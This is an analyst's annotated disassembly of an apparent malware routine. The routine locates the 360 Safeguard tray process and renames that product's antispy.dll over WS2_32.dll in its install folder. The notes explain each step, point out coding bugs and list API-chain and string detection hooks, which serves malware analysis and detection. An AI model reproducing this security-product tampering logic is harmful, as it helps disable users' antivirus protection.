;-----------------------------------------------------------------------
; Analyst notes (OllyDbg listing, 32-bit Windows, stdcall Win32 APIs;
; the one cdecl call, strstr, is followed by its own `add esp, 8`).
;
; Routine at 004014E4: locate a running "360tRaY.eXe" process, take the
; path of its first module, and if that path contains "safemon", rename
; <prefix>antispy.dll to <prefix>WS2_32.dll with MOVEFILE_REPLACE_EXISTING,
; where <prefix> is the path cut off at the first occurrence of "safemon".
;
; Stack frame (esp after `sub esp, 450` is called S below):
;   S+0x000  PROCESSENTRY32 pe   (dwSize = 0x128; szExeFile at pe+0x24,
;                                 th32ProcessID at pe+0x08)
;   S+0x128  char buf1[260]      (zeroed; receives <prefix>WS2_32.dll)
;   S+0x22C  MODULEENTRY32 me    (dwSize = 0x224; szExePath at me+0x120)
;   The [esp+N] operands below shift by 4 after every push; the targets
;   resolve to the three objects above.
;
; Registers: ebx = process snapshot, esi = StrStrIA then module snapshot
;   then string-copy source, ebp = CloseHandle, edi = string-copy dest.
;
; Observations:
;   - Both snapshot handles are tested against 0, not INVALID_HANDLE_VALUE
;     (-1), which is the documented failure value of CreateToolhelp32Snapshot.
;   - The module snapshot (esi) is closed only on the success path at
;     0040158A; the `je 00401661` at 00401584 leaves it open.
;   - The MoveFileExA result is discarded; eax on return is whatever the
;     last API call left in it.
;
; Detection hooks visible on this page: the API chain
;   CreateToolhelp32Snapshot -> Process32First/Next -> StrStrIA ->
;   CreateToolhelp32Snapshot(TH32CS_SNAPMODULE) -> Module32First -> strstr
;   -> MoveFileExA(..., MOVEFILE_REPLACE_EXISTING)
; and the literals "360tRaY.eXe", "safemon", "antispy.dll", "WS2_32.dll".
;-----------------------------------------------------------------------
004014E3 90 nop ; check whether 360 Safeguard is present
004014E4 /$ 81EC 50040000 sub esp, 450 ; rename 360 Safeguard's antispy.dll to WS2_32.dll
004014EA |. 53 push ebx
004014EB |. 6A 00 push 0 ; /ProcessID = 0
004014ED |. 6A 02 push 2 ; |Flags = TH32CS_SNAPPROCESS
; [esp+C] is S after the three pushes: pe.dwSize = 0x128 = sizeof(PROCESSENTRY32)
004014EF |. C74424 0C 280>mov dword ptr [esp+C], 128 ; |
; [esp+238] is S+0x22C: me.dwSize = 0x224 = sizeof(MODULEENTRY32)
004014F7 |. C78424 380200>mov dword ptr [esp+238], 224 ; |
00401502 |. E8 A9080000 call 00401DB0 ; \CreateToolhelp32Snapshot
00401507 |. 8BD8 mov ebx, eax ; ebx = process snapshot handle
; zero check only; a failed call returns INVALID_HANDLE_VALUE (-1), which falls through
00401509 |. 85DB test ebx, ebx
0040150B |. 0F84 55010000 je 00401666
00401511 |. 55 push ebp
00401512 |. 8D4424 08 lea eax, dword ptr [esp+8] ; eax = &pe
00401516 |. 56 push esi
00401517 |. 50 push eax ; /lppe
00401518 |. 53 push ebx ; |hSnapshot
00401519 |. E8 8C080000 call 00401DAA ; \Process32First
0040151E |. 8B2D B8204000 mov ebp, dword ptr [4020B8] ; kernel32.CloseHandle
00401524 |. 85C0 test eax, eax
00401526 |. 0F84 35010000 je 00401661 ; enumeration failed -> close snapshot and return
0040152C |. 8B35 30214000 mov esi, dword ptr [402130] ; SHLWAPI.StrStrIA
; Loop: StrStrIA(pe.szExeFile, "360tRaY.eXe"). StrStrIA is case-insensitive,
; so the odd casing of the literal does not affect matching (presumably chosen
; to defeat a case-sensitive string scan -- inference, not shown by the code).
00401532 |> 8D4C24 30 /lea ecx, dword ptr [esp+30] ; look for a 360Tray.exe process; if found, go to 40155E
00401536 |. 68 70304000 |push 00403070 ; ASCII "360tRaY.eXe"
0040153B |. 51 |push ecx ; ecx = &pe.szExeFile
0040153C |. FFD6 |call esi
0040153E |. 85C0 |test eax, eax
00401540 |. 75 1C |jnz short 0040155E ; match -> process found
00401542 |. 8D5424 0C |lea edx, dword ptr [esp+C] ; edx = &pe
00401546 |. 52 |push edx ; /lppe
00401547 |. 53 |push ebx ; |hSnapshot
00401548 |. E8 57080000 |call 00401DA4 ; \Process32Next
0040154D |. 85C0 |test eax, eax
0040154F |.^ 75 E1 \jnz short 00401532
; No matching process: CloseHandle(snapshot) and return.
00401551 |. 53 push ebx
00401552 |. FFD5 call ebp
00401554 |. 5E pop esi
00401555 |. 5D pop ebp
00401556 |. 5B pop ebx
00401557 |. 81C4 50040000 add esp, 450
0040155D |. C3 retn
; Process found: snapshot its modules by pe.th32ProcessID.
0040155E |> 8B4424 14 mov eax, dword ptr [esp+14] ; eax = pe.th32ProcessID
00401562 |. 50 push eax ; /ProcessID
00401563 |. 6A 08 push 8 ; |Flags = TH32CS_SNAPMODULE
00401565 |. E8 46080000 call 00401DB0 ; \CreateToolhelp32Snapshot
0040156A |. 8BF0 mov esi, eax ; esi = module snapshot handle
0040156C |. 85F6 test esi, esi ; same zero-only check as above
0040156E |. 0F84 ED000000 je 00401661
00401574 |. 8D8C24 380200>lea ecx, dword ptr [esp+238] ; get the file path (ecx = &me)
0040157B |. 51 push ecx ; /pModuleentry
0040157C |. 56 push esi ; |hSnapshot
0040157D |. E8 34080000 call 00401DB6 ; \Module32First
00401582 |. 85C0 test eax, eax
; on this branch the module snapshot in esi is never closed (handle leak)
00401584 |. 0F84 D7000000 je 00401661
0040158A |. 56 push esi
0040158B |. FFD5 call ebp ; CloseHandle(module snapshot)
; strstr(me.szExePath, "safemon") -- cdecl, hence the add esp, 8 after the call
0040158D |. 8D9424 580300>lea edx, dword ptr [esp+358] ; does the path contain "safemon"? if so, treat it as a 360 process
00401594 |. 68 68304000 push 00403068 ; /s2 = "safemon"
00401599 |. 52 push edx ; |s1
0040159A |. FF15 E8204000 call dword ptr [4020E8] ; \strstr
004015A0 |. 83C4 08 add esp, 8
004015A3 |. 85C0 test eax, eax
004015A5 |. 0F84 B6000000 je 00401661 ; not a 360 path -> clean up and return
004015AB |. 57 push edi
; Truncate szExePath at the first byte of the "safemon" match; what remains
; is the <prefix> used for both file names below.
004015AC |. C600 00 mov byte ptr [eax], 0
; Inlined memset(buf1, 0, 0x41*4 = 260 bytes)
004015AF |. B9 41000000 mov ecx, 41
004015B4 |. 33C0 xor eax, eax
004015B6 |. 8DBC24 380100>lea edi, dword ptr [esp+138] ; edi = buf1
004015BD |. 8D9424 380100>lea edx, dword ptr [esp+138] ; edx = buf1 (kept for the copy)
004015C4 |. F3:AB rep stos dword ptr es:[edi]
; Inlined strlen(<prefix>): repne scasb with al = 0, ecx = -(len+1) -> not ecx = len+1
004015C6 |. 83C9 FF or ecx, FFFFFFFF
004015C9 |. 8DBC24 5C0300>lea edi, dword ptr [esp+35C] ; edi = me.szExePath (now <prefix>)
004015D0 |. F2:AE repne scas byte ptr es:[edi]
004015D2 |. F7D1 not ecx ; ecx = len+1
004015D4 |. 2BF9 sub edi, ecx ; file move (edi back to start of <prefix>)
; The MoveFileExA flag is pushed here, early; every [esp+N] below shifts by 4.
004015D6 |. 6A 01 push 1 ; /Flags = REPLACE_EXISTING
; Inlined strcpy(buf1, <prefix>): dword copy of len+1 >> 2, then the 0-3 remaining bytes
004015D8 |. 8BC1 mov eax, ecx ; |eax = len+1 (saved)
004015DA |. 8BF7 mov esi, edi ; |esi = <prefix>
004015DC |. C1E9 02 shr ecx, 2 ; |
004015DF |. 8BFA mov edi, edx ; |edi = buf1
004015E1 |. 8D9424 3C0100>lea edx, dword ptr [esp+13C] ; |edx = buf1 (re-derived after the push)
004015E8 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
004015EA |. 8BC8 mov ecx, eax ; |
004015EC |. 33C0 xor eax, eax ; |al = 0 for the scans below
004015EE |. 83E1 03 and ecx, 3 ; |
004015F1 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |
; Inlined strcat(buf1, "WS2_32.dll"): length of the literal, then scan buf1 to its NUL
004015F3 |. BF 5C304000 mov edi, 0040305C ; |ASCII "WS2_32.dll"
004015F8 |. 83C9 FF or ecx, FFFFFFFF ; |
004015FB |. F2:AE repne scas byte ptr es:[edi] ; |
004015FD |. F7D1 not ecx ; |ecx = strlen("WS2_32.dll")+1
004015FF |. 2BF9 sub edi, ecx ; |
00401601 |. 8BF7 mov esi, edi ; |esi = "WS2_32.dll"
00401603 |. 8BFA mov edi, edx ; |edi = buf1
00401605 |. 8BD1 mov edx, ecx ; |edx = len+1 of the literal
00401607 |. 83C9 FF or ecx, FFFFFFFF ; |
0040160A |. F2:AE repne scas byte ptr es:[edi] ; |find NUL of buf1
0040160C |. 8BCA mov ecx, edx ; |
0040160E |. 4F dec edi ; |edi -> buf1's terminator (append point)
0040160F |. C1E9 02 shr ecx, 2 ; |
00401612 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401614 |. 8BCA mov ecx, edx ; |
00401616 |. 8D9424 600300>lea edx, dword ptr [esp+360] ; |edx = me.szExePath (<prefix>)
0040161D |. 83E1 03 and ecx, 3 ; |
00401620 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |buf1 = <prefix>WS2_32.dll
; Inlined strcat(me.szExePath, "antispy.dll"), same shape as above
00401622 |. BF 50304000 mov edi, 00403050 ; |ASCII "antispy.dll"
00401627 |. 83C9 FF or ecx, FFFFFFFF ; |
0040162A |. F2:AE repne scas byte ptr es:[edi] ; |
0040162C |. F7D1 not ecx ; |
0040162E |. 2BF9 sub edi, ecx ; |
00401630 |. 8BF7 mov esi, edi ; |esi = "antispy.dll"
00401632 |. 8BFA mov edi, edx ; |edi = <prefix> in szExePath
00401634 |. 8BD1 mov edx, ecx ; |
00401636 |. 83C9 FF or ecx, FFFFFFFF ; |
00401639 |. F2:AE repne scas byte ptr es:[edi] ; |
0040163B |. 8BCA mov ecx, edx ; |
0040163D |. 4F dec edi ; |
0040163E |. C1E9 02 shr ecx, 2 ; |
00401641 |. F3:A5 rep movs dword ptr es:[edi], dword p>; |
00401643 |. 8BCA mov ecx, edx ; |
00401645 |. 8D8424 3C0100>lea eax, dword ptr [esp+13C] ; |eax = buf1
0040164C |. 83E1 03 and ecx, 3 ; |
0040164F |. 50 push eax ; |NewName = <prefix>WS2_32.dll
00401650 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; |szExePath = <prefix>antispy.dll (rep movsb does not use esp)
00401652 |. 8D8C24 640300>lea ecx, dword ptr [esp+364] ; |ecx = szExePath (offset shifted by the push above)
00401659 |. 51 push ecx ; |ExistingName = <prefix>antispy.dll
; MoveFileExA(<prefix>antispy.dll, <prefix>WS2_32.dll, MOVEFILE_REPLACE_EXISTING); result ignored
0040165A |. FF15 78204000 call dword ptr [402078] ; \MoveFileExA
00401660 |. 5F pop edi
; Common exit: CloseHandle(process snapshot) and restore callee-saved regs.
00401661 |> 53 push ebx
00401662 |. FFD5 call ebp
00401664 |. 5E pop esi
00401665 |. 5D pop ebp
00401666 |> 5B pop ebx
00401667 |. 81C4 50040000 add esp, 450
0040166D \. C3 retn
|